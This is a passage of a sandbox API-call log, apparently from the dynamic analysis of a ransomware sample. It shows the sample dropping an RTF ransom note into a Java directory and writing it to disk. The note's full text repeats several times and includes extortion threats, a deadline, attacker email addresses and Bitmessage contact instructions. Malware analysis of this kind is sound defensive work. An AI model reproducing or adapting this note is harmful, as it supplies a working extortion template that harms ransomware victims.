Mail\\wabmig.exe\r\nòÇ\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0203.662] WriteFile (in: hFile=0x2bc, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0203.662] CloseHandle (hObject=0x2bc) returned 1 [0203.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\amd64\\#readme_eman#.rtf")) returned 0xffffffff [0203.664] GetLastError () returned 0x2 [0203.664] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\amd64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2bc [0203.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0203.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0203.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 